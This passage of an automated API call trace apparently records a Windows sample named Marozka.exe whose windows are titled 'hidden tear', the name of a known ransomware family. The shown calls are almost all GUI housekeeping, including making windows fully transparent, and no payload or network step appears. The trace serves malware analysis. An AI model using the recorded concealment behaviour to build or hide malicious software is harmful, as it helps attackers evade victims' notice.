16 [0038.176] CreateIconFromResourceEx (presbits=0x263b330, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x1b00a5 [0038.177] SendMessageW (hWnd=0x60116, Msg=0x80, wParam=0x0, lParam=0x1b00a5) returned 0x0 [0038.177] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x80, wParam=0x0, lParam=0x1b00a5) returned 0x0 [0038.178] SendMessageW (hWnd=0x60116, Msg=0x80, wParam=0x1, lParam=0x400e1) returned 0x0 [0038.178] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x80, wParam=0x1, lParam=0x400e1) returned 0x0 [0038.178] GetSystemMenu (hWnd=0x60116, bRevert=0) returned 0x70227 [0038.186] GetWindowPlacement (in: hWnd=0x60116, lpwndpl=0x5bf07c | out: lpwndpl=0x5bf07c) returned 1 [0038.187] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0038.187] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0038.187] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0038.187] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0038.187] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0038.187] GetClientRect (in: hWnd=0x60116, lpRect=0x5bf0c0 | out: lpRect=0x5bf0c0) returned 1 [0038.187] GetClientRect (in: hWnd=0x60116, lpRect=0x5bf020 | out: lpRect=0x5bf020) returned 1 [0038.187] GetWindowRect (in: hWnd=0x60116, lpRect=0x5bf020 | out: lpRect=0x5bf020) returned 1 [0038.187] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6fd70000 [0038.187] GetWindowLongW (hWnd=0x60116, nIndex=-16) returned 114229248 [0038.187] GetWindowTextLengthW (hWnd=0x60116) returned 11 [0038.187] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.188] GetSystemMetrics (nIndex=42) returned 0 [0038.188] GetWindowTextW (in: hWnd=0x60116, lpString=0x5bef98, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.188] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xd, wParam=0xc, lParam=0x5bef98) returned 0xb [0038.188] GetWindowTextLengthW (hWnd=0x60116) returned 11 [0038.188] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.188] GetSystemMetrics (nIndex=42) returned 0 [0038.188] GetWindowTextW (in: hWnd=0x60116, lpString=0x5bef98, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.188] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xd, wParam=0xc, lParam=0x5bef98) returned 0xb [0038.188] GetWindowLongW (hWnd=0x60116, nIndex=-16) returned 114229248 [0038.188] GetWindowLongW (hWnd=0x60116, nIndex=-20) returned 328064 [0038.188] SetWindowLongW (hWnd=0x60116, nIndex=-16, dwNewLong=47120384) returned 114229248 [0038.188] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x7c, wParam=0xfffffff0, lParam=0x5bf01c) returned 0x0 [0038.189] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x7d, wParam=0xfffffff0, lParam=0x5bf01c) returned 0x0 [0038.191] SetWindowLongW (hWnd=0x60116, nIndex=-20, dwNewLong=327808) returned 328064 [0038.191] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x7c, wParam=0xffffffec, lParam=0x5bf01c) returned 0x0 [0038.191] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x7d, wParam=0xffffffec, lParam=0x5bf01c) returned 0x0 [0038.191] SetWindowPos (hWnd=0x60116, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0038.192] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x46, wParam=0x0, lParam=0x5bf034) returned 0x0 [0038.192] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x83, wParam=0x1, lParam=0x5bf00c) returned 0x0 [0038.193] GetWindowPlacement (in: hWnd=0x60116, lpwndpl=0x5bed60 | out: lpwndpl=0x5bed60) returned 1 [0038.193] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x47, wParam=0x0, lParam=0x5bf034) returned 0x0 [0038.193] GetClientRect (in: hWnd=0x60116, lpRect=0x5bed10 | out: lpRect=0x5bed10) returned 1 [0038.193] GetWindowRect (in: hWnd=0x60116, lpRect=0x5bed10 | out: lpRect=0x5bed10) returned 1 [0038.194] RedrawWindow (hWnd=0x60116, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0038.194] GetSystemMenu (hWnd=0x60116, bRevert=0) returned 0x70227 [0038.194] GetWindowPlacement (in: hWnd=0x60116, lpwndpl=0x5bf06c | out: lpwndpl=0x5bf06c) returned 1 [0038.194] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0038.194] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0038.194] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0038.194] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0038.194] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0038.194] ShowWindow (hWnd=0x60116, nCmdShow=5) returned 0 [0038.194] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0038.194] GetWindowTextLengthW (hWnd=0x60116) returned 11 [0038.195] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.195] GetSystemMetrics (nIndex=42) returned 0 [0038.195] GetWindowTextW (in: hWnd=0x60116, lpString=0x5bec5c, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.195] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xd, wParam=0xc, lParam=0x5bec5c) returned 0xb [0038.260] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6fd70000 [0038.260] GetWindowLongW (hWnd=0x60116, nIndex=-16) returned 114229248 [0038.260] GetWindowTextLengthW (hWnd=0x60116) returned 11 [0038.260] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.260] GetSystemMetrics (nIndex=42) returned 0 [0038.260] GetWindowTextW (in: hWnd=0x60116, lpString=0x5beb3c, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.260] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xd, wParam=0xc, lParam=0x5beb3c) returned 0xb [0038.260] GetWindowTextLengthW (hWnd=0x60116) returned 11 [0038.260] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.260] GetSystemMetrics (nIndex=42) returned 0 [0038.260] GetWindowTextW (in: hWnd=0x60116, lpString=0x5beb3c, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.260] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xd, wParam=0xc, lParam=0x5beb3c) returned 0xb [0038.260] GetWindowLongW (hWnd=0x60116, nIndex=-16) returned 114229248 [0038.260] GetWindowLongW (hWnd=0x60116, nIndex=-20) returned 328064 [0038.260] SetWindowLongW (hWnd=0x60116, nIndex=-16, dwNewLong=315555840) returned 114229248 [0038.261] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x7c, wParam=0xfffffff0, lParam=0x5bebc4) returned 0x0 [0038.265] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x7d, wParam=0xfffffff0, lParam=0x5bebc4) returned 0x0 [0038.266] SetWindowLongW (hWnd=0x60116, nIndex=-20, dwNewLong=852096) returned 328064 [0038.266] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x7c, wParam=0xffffffec, lParam=0x5bebc4) returned 0x0 [0038.266] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x7d, wParam=0xffffffec, lParam=0x5bebc4) returned 0x0 [0038.267] SetWindowPos (hWnd=0x60116, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0038.267] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x46, wParam=0x0, lParam=0x5bebdc) returned 0x0 [0038.267] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x83, wParam=0x1, lParam=0x5bebb4) returned 0x0 [0038.268] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x85, wParam=0x2204060d, lParam=0x0) returned 0x0 [0038.272] GetWindowPlacement (in: hWnd=0x60116, lpwndpl=0x5be924 | out: lpwndpl=0x5be924) returned 1 [0038.272] GetClientRect (in: hWnd=0x60116, lpRect=0x5be8d0 | out: lpRect=0x5be8d0) returned 1 [0038.272] GetWindowTextLengthW (hWnd=0x60116) returned 11 [0038.272] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.272] GetSystemMetrics (nIndex=42) returned 0 [0038.272] GetWindowTextW (in: hWnd=0x60116, lpString=0x5be790, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.272] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xd, wParam=0xc, lParam=0x5be790) returned 0xb [0038.272] GetClientRect (in: hWnd=0x60116, lpRect=0x5be7d8 | out: lpRect=0x5be7d8) returned 1 [0038.273] GetSysColor (nIndex=10) returned 0xb4b4b4 [0038.273] GetSysColor (nIndex=2) returned 0xd1b499 [0038.273] GetSysColor (nIndex=9) returned 0x0 [0038.273] GetSysColor (nIndex=12) returned 0xababab [0038.273] GetSysColor (nIndex=15) returned 0xf0f0f0 [0038.273] GetSysColor (nIndex=20) returned 0xffffff [0038.273] GetSysColor (nIndex=16) returned 0xa0a0a0 [0038.273] GetSysColor (nIndex=15) returned 0xf0f0f0 [0038.273] GetSysColor (nIndex=16) returned 0xa0a0a0 [0038.273] GetSysColor (nIndex=21) returned 0x696969 [0038.273] GetSysColor (nIndex=22) returned 0xe3e3e3 [0038.273] GetSysColor (nIndex=20) returned 0xffffff [0038.274] GetSysColor (nIndex=18) returned 0x0 [0038.274] GetSysColor (nIndex=1) returned 0x0 [0038.274] GetSysColor (nIndex=27) returned 0xead1b9 [0038.274] GetSysColor (nIndex=28) returned 0xf2e4d7 [0038.274] GetSysColor (nIndex=17) returned 0x6d6d6d [0038.274] GetSysColor (nIndex=13) returned 0xd77800 [0038.274] GetSysColor (nIndex=14) returned 0xffffff [0038.274] GetSysColor (nIndex=26) returned 0xcc6600 [0038.274] GetSysColor (nIndex=11) returned 0xfcf7f4 [0038.274] GetSysColor (nIndex=3) returned 0xdbcdbf [0038.274] GetSysColor (nIndex=19) returned 0x0 [0038.274] GetSysColor (nIndex=24) returned 0xe1ffff [0038.274] GetSysColor (nIndex=23) returned 0x0 [0038.274] GetSysColor (nIndex=4) returned 0xf0f0f0 [0038.274] GetSysColor (nIndex=30) returned 0xf0f0f0 [0038.274] GetSysColor (nIndex=29) returned 0xd77800 [0038.274] GetSysColor (nIndex=7) returned 0x0 [0038.274] GetSysColor (nIndex=0) returned 0xc8c8c8 [0038.274] GetSysColor (nIndex=5) returned 0xffffff [0038.274] GetSysColor (nIndex=6) returned 0x646464 [0038.274] GetSysColor (nIndex=8) returned 0x0 [0038.275] GetSystemMetrics (nIndex=80) returned 1 [0038.279] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x25e06ae, dwData=0x0) returned 1 [0038.282] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x5be438 | out: lpmi=0x5be438) returned 1 [0038.291] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x3101070a [0038.291] GetDeviceCaps (hdc=0x3101070a, index=12) returned 32 [0038.291] GetDeviceCaps (hdc=0x3101070a, index=14) returned 1 [0038.291] DeleteDC (hdc=0x3101070a) returned 1 [0038.292] GetCurrentObject (hdc=0x50106f6, type=0x1) returned 0xb00017 [0038.292] GetCurrentObject (hdc=0x50106f6, type=0x2) returned 0x900010 [0038.292] GetCurrentObject (hdc=0x50106f6, type=0x7) returned 0x61050706 [0038.292] GetCurrentObject (hdc=0x50106f6, type=0x6) returned 0x8a01c2 [0038.292] SaveDC (hdc=0x50106f6) returned 1 [0038.292] GetNearestColor (hdc=0x50106f6, color=0xf0f0f0) returned 0xf0f0f0 [0038.293] CreateSolidBrush (color=0xf0f0f0) returned 0x2010019f [0038.293] FillRect (hDC=0x50106f6, lprc=0x5be678, hbr=0x2010019f) returned 1 [0038.294] DeleteObject (ho=0x2010019f) returned 1 [0038.294] RestoreDC (hdc=0x50106f6, nSavedDC=-1) returned 1 [0038.295] GetWindowPlacement (in: hWnd=0x60116, lpwndpl=0x5be908 | out: lpwndpl=0x5be908) returned 1 [0038.295] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x47, wParam=0x0, lParam=0x5bebdc) returned 0x0 [0038.295] GetClientRect (in: hWnd=0x60116, lpRect=0x5be8b8 | out: lpRect=0x5be8b8) returned 1 [0038.295] GetWindowRect (in: hWnd=0x60116, lpRect=0x5be8b8 | out: lpRect=0x5be8b8) returned 1 [0038.295] RedrawWindow (hWnd=0x60116, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0038.295] GetSystemMenu (hWnd=0x60116, bRevert=0) returned 0x70227 [0038.295] GetWindowPlacement (in: hWnd=0x60116, lpwndpl=0x5bec10 | out: lpwndpl=0x5bec10) returned 1 [0038.295] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0038.295] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0038.295] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0038.295] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0038.296] EnableMenuItem (hMenu=0x70227, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0038.312] SetLayeredWindowAttributes (hwnd=0x60116, crKey=0x0, bAlpha=0x0, dwFlags=0x2) returned 1 [0038.337] GetCurrentThreadId () returned 0x6ac [0038.361] EnumThreadWindows (dwThreadId=0x6ac, lpfn=0x25e06d6, lParam=0x60116) returned 1 [0038.424] GetWindowLongW (hWnd=0x60044, nIndex=-8) returned 0 [0038.424] GetWindowLongW (hWnd=0x60116, nIndex=-8) returned 0 [0038.424] GetWindowLongW (hWnd=0x8002e, nIndex=-8) returned 393494 [0038.447] SetWindowLongW (hWnd=0x8002e, nIndex=-8, dwNewLong=0) returned 393494 [0038.450] GetParent (hWnd=0x60116) returned 0x0 [0038.450] GetWindowLongW (hWnd=0x60116, nIndex=-20) returned 852352 [0038.450] DestroyWindow (hWnd=0x60116) returned 1 [0038.451] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0038.456] GetWindowTextLengthW (hWnd=0x60116) returned 11 [0038.456] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.456] GetSystemMetrics (nIndex=42) returned 0 [0038.456] GetWindowTextW (in: hWnd=0x60116, lpString=0x5be70c, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.456] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xd, wParam=0xc, lParam=0x5be70c) returned 0xb [0038.456] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0038.459] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0038.460] GetCurrentActCtx (in: lphActCtx=0x5beb70 | out: lphActCtx=0x5beb70*=0xa7a054) returned 1 [0038.460] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6fd70000 [0038.460] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0038.460] CreateWindowExW (dwExStyle=0x90080, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName="hidden tear", dwStyle=0x2cf0000, X=156, Y=156, nWidth=140, nHeight=92, hWndParent=0x0, hMenu=0x0, hInstance=0x3f0000, lpParam=0x0) returned 0x70030 [0038.461] SetWindowLongW (hWnd=0x70030, nIndex=-4, dwNewLong=1952448832) returned 39716286 [0038.461] GetWindowLongW (hWnd=0x70030, nIndex=-4) returned 1952448832 [0038.461] SetWindowLongW (hWnd=0x70030, nIndex=-4, dwNewLong=39716606) returned 1952448832 [0038.461] GetWindowLongW (hWnd=0x70030, nIndex=-4) returned 39716606 [0038.461] GetWindowLongW (hWnd=0x70030, nIndex=-16) returned 114229248 [0038.462] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x81, wParam=0x0, lParam=0x5be590) returned 0x1 [0038.462] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x83, wParam=0x0, lParam=0x5be57c) returned 0x0 [0038.463] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x1, wParam=0x0, lParam=0x5be590) returned 0x0 [0038.463] GetClientRect (in: hWnd=0x70030, lpRect=0x5be248 | out: lpRect=0x5be248) returned 1 [0038.463] GetWindowRect (in: hWnd=0x70030, lpRect=0x5be248 | out: lpRect=0x5be248) returned 1 [0038.463] SetWindowTextW (hWnd=0x70030, lpString="hidden tear") returned 1 [0038.463] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xc, wParam=0x0, lParam=0x263c7b8) returned 0x1 [0038.463] SetLayeredWindowAttributes (hwnd=0x70030, crKey=0x0, bAlpha=0x0, dwFlags=0x2) returned 1 [0038.464] GetStartupInfoW (in: lpStartupInfo=0x263ca94 | out: lpStartupInfo=0x263ca94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0038.465] GetParent (hWnd=0x70030) returned 0x0 [0038.465] GetStockObject (i=5) returned 0x900015 [0038.465] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0038.465] CoTaskMemAlloc (cb=0x5a) returned 0xa91830 [0038.466] RegisterClassW (lpWndClass=0x5bea4c) returned 0xc174 [0038.466] CoTaskMemFree (pv=0xa91830) [0038.466] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0038.466] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.141b42a_r9_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x3f0000, lpParam=0x0) returned 0x40212 [0038.466] SetWindowLongW (hWnd=0x40212, nIndex=-4, dwNewLong=1952448832) returned 39716646 [0038.466] GetWindowLongW (hWnd=0x40212, nIndex=-4) returned 1952448832 [0038.466] SetWindowLongW (hWnd=0x40212, nIndex=-4, dwNewLong=39716686) returned 1952448832 [0038.466] GetWindowLongW (hWnd=0x40212, nIndex=-4) returned 39716686 [0038.466] GetWindowLongW (hWnd=0x40212, nIndex=-16) returned 79691776 [0038.467] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x24, wParam=0x0, lParam=0x5be5c4) returned 0x0 [0038.467] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x81, wParam=0x0, lParam=0x5be5b8) returned 0x1 [0038.468] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x83, wParam=0x0, lParam=0x5be5a4) returned 0x0 [0038.468] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x1, wParam=0x0, lParam=0x5be5b8) returned 0x0 [0038.469] SetWindowLongW (hWnd=0x70030, nIndex=-8, dwNewLong=262674) returned 0 [0038.470] SendMessageW (hWnd=0x70030, Msg=0x80, wParam=0x0, lParam=0x1b00a5) returned 0x0 [0038.470] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x80, wParam=0x0, lParam=0x1b00a5) returned 0x0 [0038.470] SendMessageW (hWnd=0x70030, Msg=0x80, wParam=0x1, lParam=0x400e1) returned 0x0 [0038.470] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x80, wParam=0x1, lParam=0x400e1) returned 0x0 [0038.500] GetSystemMenu (hWnd=0x70030, bRevert=0) returned 0x80227 [0038.500] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5beb80 | out: lpwndpl=0x5beb80) returned 1 [0038.500] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0038.500] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0038.500] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0038.500] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0038.500] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0038.500] GetClientRect (in: hWnd=0x70030, lpRect=0x5bebc4 | out: lpRect=0x5bebc4) returned 1 [0038.500] GetClientRect (in: hWnd=0x70030, lpRect=0x5beb24 | out: lpRect=0x5beb24) returned 1 [0038.500] GetWindowRect (in: hWnd=0x70030, lpRect=0x5beb24 | out: lpRect=0x5beb24) returned 1 [0038.500] SetWindowPos (hWnd=0x70030, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x57) returned 1 [0038.500] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x46, wParam=0x0, lParam=0x5bea8c) returned 0x0 [0038.504] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0038.505] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5be7d4 | out: lpwndpl=0x5be7d4) returned 1 [0038.505] GetClientRect (in: hWnd=0x70030, lpRect=0x5be780 | out: lpRect=0x5be780) returned 1 [0038.505] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0038.505] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.505] GetSystemMetrics (nIndex=42) returned 0 [0038.505] GetWindowTextW (in: hWnd=0x70030, lpString=0x5be640, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.505] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5be640) returned 0xb [0038.505] GetClientRect (in: hWnd=0x70030, lpRect=0x5be688 | out: lpRect=0x5be688) returned 1 [0038.505] GetCurrentObject (hdc=0x10105d6, type=0x1) returned 0xb00017 [0038.505] GetCurrentObject (hdc=0x10105d6, type=0x2) returned 0x900010 [0038.505] GetCurrentObject (hdc=0x10105d6, type=0x7) returned 0xc05072a [0038.505] GetCurrentObject (hdc=0x10105d6, type=0x6) returned 0x8a01c2 [0038.505] SaveDC (hdc=0x10105d6) returned 1 [0038.505] GetNearestColor (hdc=0x10105d6, color=0xf0f0f0) returned 0xf0f0f0 [0038.505] CreateSolidBrush (color=0xf0f0f0) returned 0x2110019f [0038.506] FillRect (hDC=0x10105d6, lprc=0x5be528, hbr=0x2110019f) returned 1 [0038.506] DeleteObject (ho=0x2110019f) returned 1 [0038.506] RestoreDC (hdc=0x10105d6, nSavedDC=-1) returned 1 [0038.506] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5be7b8 | out: lpwndpl=0x5be7b8) returned 1 [0038.506] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x47, wParam=0x0, lParam=0x5bea8c) returned 0x0 [0038.506] GetClientRect (in: hWnd=0x70030, lpRect=0x5be768 | out: lpRect=0x5be768) returned 1 [0038.506] GetWindowRect (in: hWnd=0x70030, lpRect=0x5be768 | out: lpRect=0x5be768) returned 1 [0038.508] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x83, wParam=0x1, lParam=0x5be5a4) returned 0x0 [0038.509] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0038.511] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5be314 | out: lpwndpl=0x5be314) returned 1 [0038.511] GetClientRect (in: hWnd=0x70030, lpRect=0x5be2c0 | out: lpRect=0x5be2c0) returned 1 [0038.511] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0038.511] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.511] GetSystemMetrics (nIndex=42) returned 0 [0038.511] GetWindowTextW (in: hWnd=0x70030, lpString=0x5be180, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.511] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5be180) returned 0xb [0038.511] GetClientRect (in: hWnd=0x70030, lpRect=0x5be1c8 | out: lpRect=0x5be1c8) returned 1 [0038.511] GetCurrentObject (hdc=0x60100ce, type=0x1) returned 0xb00017 [0038.511] GetCurrentObject (hdc=0x60100ce, type=0x2) returned 0x900010 [0038.511] GetCurrentObject (hdc=0x60100ce, type=0x7) returned 0xc05072a [0038.511] GetCurrentObject (hdc=0x60100ce, type=0x6) returned 0x8a01c2 [0038.511] SaveDC (hdc=0x60100ce) returned 1 [0038.511] GetNearestColor (hdc=0x60100ce, color=0xf0f0f0) returned 0xf0f0f0 [0038.511] CreateSolidBrush (color=0xf0f0f0) returned 0x2210019f [0038.511] FillRect (hDC=0x60100ce, lprc=0x5be068, hbr=0x2210019f) returned 1 [0038.511] DeleteObject (ho=0x2210019f) returned 1 [0038.511] RestoreDC (hdc=0x60100ce, nSavedDC=-1) returned 1 [0038.512] SetWindowLongW (hWnd=0x70030, nIndex=-8, dwNewLong=262674) returned 262674 [0038.513] SendMessageW (hWnd=0x40212, Msg=0x80, wParam=0x1, lParam=0x400e1) returned 0x0 [0038.513] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x80, wParam=0x1, lParam=0x400e1) returned 0x0 [0038.514] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6fd70000 [0038.514] GetWindowLongW (hWnd=0x70030, nIndex=-16) returned 382664704 [0038.514] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0038.514] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.514] GetSystemMetrics (nIndex=42) returned 0 [0038.514] GetWindowTextW (in: hWnd=0x70030, lpString=0x5bea9c, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.514] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5bea9c) returned 0xb [0038.514] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0038.514] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.514] GetSystemMetrics (nIndex=42) returned 0 [0038.515] GetWindowTextW (in: hWnd=0x70030, lpString=0x5bea9c, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.515] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5bea9c) returned 0xb [0038.515] GetWindowLongW (hWnd=0x70030, nIndex=-16) returned 382664704 [0038.515] GetWindowLongW (hWnd=0x70030, nIndex=-20) returned 590208 [0038.515] SetWindowLongW (hWnd=0x70030, nIndex=-16, dwNewLong=315555840) returned 382664704 [0038.515] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x7c, wParam=0xfffffff0, lParam=0x5beb24) returned 0x0 [0038.515] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x7d, wParam=0xfffffff0, lParam=0x5beb24) returned 0x0 [0038.515] 